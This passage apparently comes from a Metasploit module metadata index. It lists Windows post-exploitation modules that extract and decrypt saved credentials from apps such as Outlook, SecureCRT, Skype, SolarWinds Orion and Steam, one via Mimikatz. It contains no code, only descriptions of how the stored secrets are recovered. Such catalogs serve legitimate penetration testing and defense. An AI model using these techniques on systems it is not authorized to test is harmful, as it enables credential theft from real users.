"2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/navicat.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/navicat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/nimbuzz": { - "name": "Windows Gather Nimbuzz Instant Messenger 
Password Extractor", - "fullname": "post/windows/gather/credentials/nimbuzz", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "sil3ntdre4m ", - "Unknown" - ], - "description": "This module extracts the account passwords saved by Nimbuzz Instant\n Messenger in hex format.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/nimbuzz.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/nimbuzz", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/opera": { - "name": "Opera credential gatherer", - "fullname": "post/windows/gather/credentials/opera", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Opera credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/opera.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/opera", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/operamail": { - "name": "Operamail credential gatherer", - "fullname": "post/windows/gather/credentials/operamail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Operamail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/operamail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/operamail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/outlook": { - "name": "Windows Gather Microsoft Outlook Saved Password Extraction", - "fullname": "post/windows/gather/credentials/outlook", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Justin Cacak" - ], - "description": "This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/outlook.rb", - 
"is_install_path": true, - "ref_name": "windows/gather/credentials/outlook", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/plsql_developer": { - "name": "Windows Gather PL/SQL Developer Connection Credentials", - "fullname": "post/windows/gather/credentials/plsql_developer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Adam Caudill", - "Jemmy Wang" - ], - "description": "This module can decrypt the histories and connection credentials of PL/SQL Developer,\n and passwords are available if the user chooses to remember.", - "references": [ - "URL-https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-11-09 13:58:14 +0000", - "path": "/modules/post/windows/gather/credentials/plsql_developer.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/plsql_developer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/postbox": { - "name": "Postbox credential gatherer", - "fullname": "post/windows/gather/credentials/postbox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Postbox credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/postbox.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/postbox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/pulse_secure": { - "name": "Windows Pulse Secure Connect Client Saved Password Extractor", - "fullname": "post/windows/gather/credentials/pulse_secure", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Quentin Kaiser " - ], - "description": "This module extracts and decrypts saved Pulse Secure Connect Client passwords from the\n Windows Registry. This module can only access credentials created by the user that the\n Meterpreter session is running as.\n Note that this module cannot link the password to a username unless the\n Meterpreter sessions is running as SYSTEM. 
This is because the username associated\n with a password is saved in 'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\[SID].dat',\n which is only readable by SYSTEM.\n Note that for enterprise deployment, this username is almost always the domain\n username.", - "references": [ - "CVE-2020-8956", - "URL-https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials", - "URL-https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store", - "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/credentials/pulse_secure.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/pulse_secure", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/purevpn_cred_collector": { - "name": "Windows Gather PureVPN Client Credential Collector", - "fullname": "post/windows/gather/credentials/purevpn_cred_collector", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Manuel Nader #AgoraSecurity" - ], - "description": "Finds the password stored for the PureVPN Client.", - "references": [ - "URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Credential-Leak-Flaws-in-Windows-PureVPN-Client/", - "URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-010/?fid=11779" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": 
"/modules/post/windows/gather/credentials/purevpn_cred_collector.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/purevpn_cred_collector", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/qq": { - "name": "QQ credential gatherer", - "fullname": "post/windows/gather/credentials/qq", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for QQ credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/qq.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/qq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/quassel_irc": { - "name": "Quassel IRC credential gatherer", - "fullname": "post/windows/gather/credentials/quassel_irc", - "aliases": [], - "rank": 300, - 
"disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Quassel IRC Client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/quassel_irc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/quassel_irc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/razer_synapse": { - "name": "Windows Gather Razer Synapse Password Extraction", - "fullname": "post/windows/gather/credentials/razer_synapse", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Thomas McCarthy \"smilingraccoon\" ", - "Matt Howard \"pasv\" ", - "Brandon McCann \"zeknox\" " - ], - "description": "This module will enumerate passwords stored by the Razer Synapse\n client. The encryption key and iv is publicly known. This module\n will not only extract encrypted password but will also decrypt\n password using public key. 
Affects versions earlier than 1.7.15.", - "references": [ - "URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/", - "URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/razer_synapse.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/razer_synapse", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/razorsql": { - "name": "Windows Gather RazorSQL Credentials", - "fullname": "post/windows/gather/credentials/razorsql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Paul Rascagneres ", - "sinn3r " - ], - "description": "This module stores username, password, type, host, port, database (and name)\n collected from profiles.txt of RazorSQL.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/razorsql.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/razorsql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/rdc_manager_creds": { - "name": "Windows Gather Remote Desktop Connection Manager Saved Password Extraction", - "fullname": 
"post/windows/gather/credentials/rdc_manager_creds", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Tom Sellers " - ], - "description": "This module extracts and decrypts saved Microsoft Remote Desktop\n Connection Manager (RDCMan) passwords the .RDG files of users.\n The module will attempt to find the files configured for all users\n on the target system. Passwords for managed hosts are encrypted by\n default. In order for decryption of these passwords to be successful,\n this module must be executed under the same account as the user which\n originally encrypted the password. Passwords stored in plain text will\n be captured and documented.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/rdc_manager_creds.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/rdc_manager_creds", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/redis_desktop_manager": { - "name": "RedisDesktopManager credential gatherer", - "fullname": "post/windows/gather/credentials/redis_desktop_manager", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in 
the module documentation.\n This module searches for RedisDesktopManager credentials on a Windows host.", - "references": [ - "URL-https://blog.kali-team.cn/Metasploit-PackRat-RedisDesktopManager-42dc7ab063f040d182da0f1fc16db74e" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/redis_desktop_manager.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/redis_desktop_manager", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/safari": { - "name": "Safari credential gatherer", - "fullname": "post/windows/gather/credentials/safari", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for safari credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/safari.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/safari", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/seamonkey": { - "name": "Seamonkey credential gatherer", - "fullname": "post/windows/gather/credentials/seamonkey", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for seamonkey credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/seamonkey.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/seamonkey", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/securecrt": { - "name": "Windows SecureCRT Session Information Enumeration", - "fullname": "post/windows/gather/credentials/securecrt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "HyperSine", - "Kali-Team " - ], - "description": "This module will determine if SecureCRT is installed on the target system and, if it is, it will try to\n dump all saved session information from the target. 
The passwords for these saved sessions will then be decrypted\n where possible, using the decryption information that HyperSine reverse engineered.\n\n Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.", - "references": [ - "URL-https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/securecrt.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/securecrt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/skype": { - "name": "Windows Gather Skype Saved Password Hash Extraction", - "fullname": "post/windows/gather/credentials/skype", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "mubix ", - "hdm " - ], - "description": "This module finds saved login credentials\n for the Windows Skype client. The hash is in MD5 format\n that uses the username, a static string \"\\nskyper\\n\" and the\n password. 
The resulting MD5 is stored in the Config.xml file\n for the user after being XOR'd against a key generated by applying\n 2 SHA1 hashes of \"salt\" data which is stored in ProtectedStorage\n using the Windows API CryptProtectData against the MD5", - "references": [ - "URL-http://www.recon.cx/en/f/vskype-part2.pdf", - "URL-https://web.archive.org/web/20140207115406/http://insecurety.net/?p=427", - "URL-https://github.com/skypeopensource/tools" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/skype.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/skype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/smartermail": { - "name": "Windows Gather SmarterMail Password Extraction", - "fullname": "post/windows/gather/credentials/smartermail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Joe Giron", - "bcoles ", - "sinn3r " - ], - "description": "This module extracts and decrypts the sysadmin password in the\n SmarterMail 'mailConfig.xml' configuration file. 
The encryption\n key and IV are publicly known.\n\n This module has been tested successfully on SmarterMail versions\n 10.7.4842 and 11.7.5136.", - "references": [ - "URL-http://www.gironsec.com/blog/tag/cracking-smartermail/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/smartermail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/smartermail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/smartftp": { - "name": "Windows Gather SmartFTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/smartftp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module finds saved login credentials\n for the SmartFTP FTP client for windows.\n It finds the saved passwords and decrypts\n them.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/smartftp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/smartftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/solarwinds_orion_dump": { - "name": "SolarWinds Orion Secrets Dump", - "fullname": 
"post/windows/gather/credentials/solarwinds_orion_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-08", - "type": "post", - "author": [ - "npm ", - "Rob Fuller" - ], - "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with SolarWinds Orion NPM installed. The module\n supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n extraction and decryption of the data are provided to allow session migration\n during execution in order to log in to the SQL database using SSPI. Tested on\n the 2020 version of SolarWinds Orion NPM. This module is possible only because\n of the source code and technical information published by Rob Fuller and\n Atredis Partners.", - "references": [ - "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/", - "URL-https://github.com/atredispartners/solarwinds-orion-cryptography" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/solarwinds_orion_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt SolarWinds Orion database export CSV file" - }, - { - "name": "Dump", - "description": "Export SolarWinds Orion database and perform decryption" - }, - { - "name": "Export", - "description": "Export SolarWinds Orion database without decryption" - } - ] - }, - 
"post_windows/gather/credentials/spark_im": { - "name": "Windows Gather Spark IM Password Extraction", - "fullname": "post/windows/gather/credentials/spark_im", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Brandon McCann \"zeknox\" ", - "Thomas McCarthy \"smilingraccoon\" " - ], - "description": "This module will enumerate passwords stored by the Spark IM client.\n The encryption key is publicly known. This module will not only extract encrypted\n password but will also decrypt password using public key.", - "references": [ - "URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/spark_im.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/spark_im", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/srware": { - "name": "Srware credential gatherer", - "fullname": "post/windows/gather/credentials/srware", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Srware credentials on a Windows host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/srware.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/srware", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/sso": { - "name": "Windows Single Sign On Credential Collector (Mimikatz)", - "fullname": "post/windows/gather/credentials/sso", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Kiwi (Mimikatz) extension. 
Blank passwords will not be stored\n in the database.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/sso.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/sso", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/steam": { - "name": "Windows Gather Steam Client Session Collector.", - "fullname": "post/windows/gather/credentials/steam", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nikolai Rusakov " - ], - "description": "This module will collect Steam session information from an\n account set to autologin.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/steam.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/steam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/sylpheed": { - "name": "Sylpheed email credential gatherer", - "fullname": "post/windows/gather/credentials/sylpheed", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Jacob Tierney", - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials stored on Sylpheed email client in a windows remote host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/sylpheed.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/sylpheed", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/tango": { - "name": "Tango credential gatherer", - "fullname": "post/windows/gather/credentials/tango", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information 